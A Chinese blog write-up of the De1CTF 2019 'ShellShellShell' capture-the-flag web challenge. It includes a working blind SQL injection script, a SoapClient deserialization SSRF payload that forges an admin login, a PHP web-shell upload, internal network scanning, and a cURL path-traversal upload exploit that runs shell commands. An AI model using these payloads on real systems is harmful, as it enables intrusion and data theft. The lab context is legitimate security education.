[De1CTF 2019]ShellShellShell

最新推荐文章于 2022-08-18 20:12:57 发布
最新推荐文章于 2022-08-18 20:12:57 发布
阅读量1.6k 收藏 4
点赞数 4
分类专栏: CTF write up 代码审计 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43756333/article/details/107386403
版权

平台:buuoj.cn
打开靶机是一个登录框
在这里插入图片描述
扫描器发现一些文件
在这里插入图片描述
后缀有个~还是第一次见,了解到是编辑器留下的备份文件,访问确实有源码
把几个文件都复制下来看看,seay审计软件爆了几个危险部分
在这里插入图片描述
看下位置代码
在这里插入图片描述
将传入的参数传到数据库执行。注意到还有一个get_column函数
在这里插入图片描述
传入的反引号会被替换成单引号。为sql注入创造了条件
看下哪个方法用到了insert函数
找到:
在这里插入图片描述
可以看到我们可以post一个signature去insert,并且这里对于这个参数是没有任何过滤的,所以很容易造成Sql注入
想要publish,就必须登录。
在这里插入图片描述
因此我们?action=register来注册一个账号并登录
然后注册和登录就必须通过code验证
可以看到是一个简单的md5碰撞,脚本爆破即可

import hashlib

def func(md5_val):
    for x in range(999999, 100000000):
        md5_value=hashlib.md5(str(x).encode(encoding='utf-8')).hexdigest()
        if md5_value[:5]==md5_val:
            return str(x)

if __name__ == '__main__':
    print(func('ac7a2'))

在这里插入图片描述
在这里插入图片描述
登录成功我们来抓publish的包验证sql注入
在这里插入图片描述
根据代码语句构造payload:
在这里插入图片描述
那么确认了sql注入的存在,由于回显都是ok,考虑时间盲注
编写脚本:

import requests

url="http://f19eea67-1117-416a-9834-1d58c44d1f53.node3.buuoj.cn/index.php?action=publish"
cookie = {"PHPSESSID":"05gn4tlsacq7pfundd7f89f983"}

k="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
flag=""

for i in range(50): 
    for j in k:
        j = ord(j)
        data={
            'mood':'0',
            'signature':'1`,if(ascii(substr((select password from ctf_users where username=`admin`),{},1))={},sleep(3),0))#'.format(i,j)
            }
        try:
            r=requests.post(url,data=data,cookies=cookie,timeout=(2,2))
        except:
            flag+=chr(j)
            print(flag)
            break

至于这里为什么是知道跑admin和ctf_users表,嗯。。。。。看代码得到的
在这里插入图片描述
跑出密码的md5:c991707fdf339958eded91331fb11ba0
网站解密得jaivypassword
知道了admin和password,我们来试着登录
却登录失败
在这里插入图片描述
原来设置了ip限制
在这里插入图片描述
跟进get_ip函数
在这里插入图片描述
看来只有真实管理员地址才能登录
这里就出现了另一个考点:soapclient反序列化配合ssrf
通过?action=phpinfo看到php开启了soap拓展
在这里插入图片描述
PHP 中,soap扩展可以用来提供和使用 Web Services,关于Web Services,百度百科
soapclient类则是用来创建soap数据报文,与wsdl接口进行交互,它有几个内置魔术方法
在这里插入图片描述
回到代码,showmess函数中有一个反序列化点

反序列化$row[2]的值也就是$mood是我们可控的,假如我们把反序列化语句插入到注入语句中,比如

a`,{serialize);#

它传入库中,我们访问index.php?action=index的时候就会触发
来实际操作一下
首先一个页面保持自己的非admin账号登录状态,另开一个页面不登录,这里为了防止cookie干扰就直接另开一个浏览器
在这里插入图片描述
在这里插入图片描述
接着开始构造soap,原理参考这位师傅

<?php
$target = 'http://127.0.0.1/index.php?action=login';
$post_string = 'username=admin&password=jaivypassword&code=1174162';
$headers = array(
    'X-Forwarded-For: 127.0.0.1',
    'Cookie: PHPSESSID=c10j7vc0fu9v8gf52qt9st4pr0'
    );
$b = new SoapClient(null,array('location' => $target,'user_agent'=>'wupco^^Content-Type: application/x-www-form-urlencoded^^'.join('^^',$headers).'^^Content-Length: '.(string)strlen($post_string).'^^^^'.$post_string,'uri'      => "aaab"));

$aaa = serialize($b);
$aaa = str_replace('^^',"\r\n",$aaa);
$aaa = str_replace('&','&',$aaa);
echo bin2hex($aaa);
?>

这里注意code和PHPSESSID要和未登录页面保持一致
把生成的poc在publish插进去
在这里插入图片描述
刷新一下?action=index使得库中的数据触发
这时$mood就是一个soap类,反序列化之后它访问不存在的方法就会触发内置__call()魔术方法
在这里插入图片描述
在这里插入图片描述
也就是给该session登录的用户管理员身份
用另一个页面登录管理员账号看看
成功登录
在这里插入图片描述
点开publish是一个上传
在这里插入图片描述
让我们传图片但啥也没过滤,直接一句话传成功
在这里插入图片描述
蚁剑连上
在这里插入图片描述
之前说了flag在内网,查看下内网信息
在这里插入图片描述
扫下其他内网主机的端口
发现11主机开了80端口
在这里插入图片描述
访问下有内容
在这里插入图片描述
保存下来
在这里插入图片描述
得到源码
在这里插入图片描述
有两层需要绕过
在这里插入图片描述
在这里插入图片描述
第一层数组来绕过,第二层随机文件名用路径穿越绕过。
构造file[1]=aaa&file[0]=php/../blacknight.php
postman构造传入
在这里插入图片描述
点击右上方的code选择php-cURL生成代码
在这里插入图片描述
但没有我们上传的内容所以要自己构造,这里参考赵总
最终exp:

<?php

$curl = curl_init();

curl_setopt_array($curl, array(
  CURLOPT_URL => "http://173.24.214.11",
  CURLOPT_RETURNTRANSFER => true,
  CURLOPT_ENCODING => "",
  CURLOPT_MAXREDIRS => 10,
  CURLOPT_TIMEOUT => 30,
  CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
  CURLOPT_CUSTOMREQUEST => "POST",
  CURLOPT_POSTFIELDS => "------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name=\"file\"; filename=\"blacknight.php\"\r\nContent-Type: false\r\n\r\n@<?php echo `find /etc -name *flag* -exec cat {} +`;\r\n\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name=\"hello\"\r\n\r\nblacknight.php\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name=\"file[2]\"\r\n\r\n222\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name=\"file[1]\"\r\n\r\n111\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name=\"file[0]\"\r\n\r\n/../blacknight.php\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nSubmit\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW--",
  CURLOPT_HTTPHEADER => array(
    "Postman-Token: a23f25ff-a221-47ef-9cfc-3ef4bd560c22",
    "cache-control: no-cache",
    "content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW"
  ),
));

$response = curl_exec($curl);
$err = curl_error($curl);

curl_close($curl);

if ($err) {
  echo "cURL Error #:" . $err;
} else {
  echo $response;
}

把flag查询语句放到中间
全部复制下来放到php文件中上传
在这里插入图片描述
访问即得flag
在这里插入图片描述
信息量太大,做的我脑瓜子嗡嗡的

hui________
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
[De1CTF 2019]ShellShellShell复现
lllffg的博客
02-18 464
[De1CTF 2019]ShellShellShell 这里是一个md5截断,直接拿脚本跑一下即可 # -*- coding: utf-8 -*- #在python2环境下执行python2 1.py '94d20' 0即可执行 import multiprocessing import hashlib import random import string import sys CHARS = string.letters + string.digits def cmp_md5(substr,
刷题[De1CTF 2019]ShellShellShell
weixin_43610673的博客
10-10 2309
关键字:sql注入,反序列化原生类,ssrf,绕过unlink() 这两题缝合出来的,tmd好难 https://github.com/rkmylo/ctf-write-ups/tree/master/2018-n1ctf/web/easy-php-540 https://xi4or0uji.github.io/2018/11/06/2018%E4%B8%8A%E6%B5%B7%E5%B8%82%E5%A4%A7%E5%AD%A6%E7%94%9F%E4%BF%A1%E6%81%AF%E5%AE%89%E5
De1ctf - shell shell shell记录
weixin_30376453的博客
08-08 345
虽然是N1CTF原题,但是自己没遇见过,还是做的题少,记录一下吧== 1.源码泄露,直接可以下到所有源码,然后代码审计到一处insert型注入: 这里直接带入insert里面,跟进去看看 insert函数对values进行正则替换,先调用get_columnsp 这里把数组分成以` , `连接的字符串并且以`反引号包在内,而正则则是匹配字符串中所有反引号之间的内容,将其取...
[De1CTF 2019]ShellShellShell 内网探测&curl 传参传文件
a3320315的博客
02-01 1412
0x01 题目描述 总共分为两部分,都是两道原题~~,我们主要讲一下第二部分,关于第一部分的writeup,以前也写过~~ 第一部分:传送门 第二部分: 我们穿了一句话之后,可以用蚁剑连接,然后就是内网探测了~~ 打开/proc/net/fib_trie,查看内网信息~~ 我们的主机是173.158.29.9,我们用蚁剑自带的端口探测工具扫一下~~ 然后我们使用wget http://173.1...
shellctf2022-writeup
Todog的博客
08-18 398
CTF
De1CTF2020:De1CTF2020
02-18
De1CTF2020:一场技术的盛宴】 De1CTF2020是一场备受瞩目的网络安全竞赛,通常在CTF(Capture The Flag)领域内举办。CTF比赛是信息安全爱好者和专业人士展示技能、学习新知识并互相交流的平台。这种竞赛涵盖了多...
De1CTF.zip
07-20
De1CTF逆向 pwn等,除web,misc外均有
De1ctf 2020 -‘check in’ writeup
01-09
在CTF(Capture The Flag)竞赛中,"De1ctf 2020 - ‘check in’" 是一道挑战性的安全题目,主要涉及到多个网络安全技术的综合运用,特别是与Web应用程序安全相关的方面。该题目的核心是通过理解并利用服务器配置中...
DE1-soc 内部资料
03-10
DE1-SOC是一款基于 Altera 公司 FPGA(Field Programmable Gate Array)芯片的开发板,主要用于教育、学习和实验目的。它集成了多种硬件模块和接口,为用户提供了丰富的功能,可以进行数字逻辑设计、嵌入式系统开发...
writeup:CTF挑战撰写
05-28
欢迎阅读我们的文章! 自2018年以来,r3kapig是一个统一的CTF团队,主要来自Eur3kA和... :2020 de1ctf写入 :0CTF / TCTF 2020质量报告 :GeekPwn云上挑战赛 20201020-n1ctf :N1CTF 2020撰写 20210111-rwctf-
(1)Shell 编程学习 Shell是什么?Shell的浅显原理 为什么要学Shell 及其第一个Shell脚本 CTF角度学习Shell
AAAAAAAAAAAA66的博客
12-25 1585
最近刷CTF题目的时候经常要用到Shell语言,但是自己并没有系统的学习,所以最近花了点时间学习一下,所以重新来梳理一下。对于稍微有一点编程语言基础的同学,能上手Shell其实不需要半小时(甚至更短),当然熟练运用还是需要积累的。 目录 Shell是什么? 主观定义 官方定义及原理 为什么要学Shell编程 第一个Shell脚本 CTF用到的shell Shell是什么? 主观定义 主观的来说:大家只要用过电脑,就接触到了Shell,比如说自己电脑打开win+r,打开cmd,虚..
[SUCTF 2019]Upload Labs 2 phar+Soapclient结合
a3320315的博客
02-02 2263
0x01 源码 // admin.php <?php include 'config.php'; class Ad{ public $cmd; public $clazz; public $func1; public $func2; public $func3; public $instance; public $arg1; ...
[CTF]反弹shell总结
cosmoslin的博客
11-11 4321
1 什么是反弹shell reverse shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 2 为什么要反弹shell 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。
[CTF]-反弹shell[2]
Mr.木Mu
05-27 1584
[二]反弹shell的本质开放端口(腾讯云,宝塔面板)什么是反弹shell反弹shell的本质是什么bash -i/dev/tcp/ip/port实例1:实例2:交互重定向>&、&>常见的反弹shell 的语句怎么理解1234结束极客大挑战where_is_my_FUMO 开放端口(腾讯云,宝塔面板) 测试反弹shell 需要保证端口开放 打开腾讯云 --> 打开安全组 --> 添加规则 添加入站规则 完成之后–> 一键放通 然后进入宝塔面板
CTF比赛时准备的一些shell命令
dfhz2014的博客
09-15 806
防御策略:sudo service apache2 start :set fileformat=unix1.写脚本关闭大部分服务,除了ssh 2.改root密码,禁用除了root之外的所有用户 sudo passwd root3.curl命令4.ssh 一秒开一秒关5.比赛开始就查看自己Linux,apache的版本,找到对应漏洞打上补丁 apache2ctl -...
浅析CTF绕过字符数字构造shell
蚁景网安学院
12-14 3616
在CTF中,虽然有很多文章有这方面的资料,但是相对来说比较零散,这里主要把自己学习和打ctf遇到的一些绕过字符数字构造shell梳理一下。
利用文件名进行GetShell---CTF题目的相关知识解析
rigous的博客
11-27 3705
0x00 今天白老师扔给我了一个虚拟机,里面有4道CTF的相关网站,我检视了一下,主要有四个文件夹,映射到了8081-8084四个端口。还有一个struts的漏洞测试环境。 首先主要看了下8084对应的题目,包括一道php登录绕过和命令执行漏洞,整个解题思路一波三折,很有意思。
【CTF】shell 通配符 / glob 模式——简单理解及利用
m0_52923241的博客
08-11 1320
通配符简介 glob 模式(globbing)也被称之为 shell 通配符,名字的起源来自于 Unix V6 中的/etc/glob (详见 man 文档)。glob 是一种特殊的模式匹配,最常见的是通配符拓展,也可以将 glob 模式设为精简了的正则表达式,在最新的 CentOS 7 中已经删除了 glob 的相关描述文档,删除的原因由于 glob 已经整合到了 shell 之中,然后就有了 shell 通配符。shell 通配符 / glob 模式通常用来匹配目录以及文件,而不是文本!!! Li
[de1ctf 2019]ssrf me 1
最新发布
03-16
[de1ctf 2019]ssrf me 1 是一道关于SSRF的题目。它的目标是通过利用SSRF漏洞,访问位于内部网络中的一个HTTP服务,从而获取flag。 具体来说,题目中提供了一个Web应用程序,该应用程序允许用户输入一个URL,然后...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

hui________

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值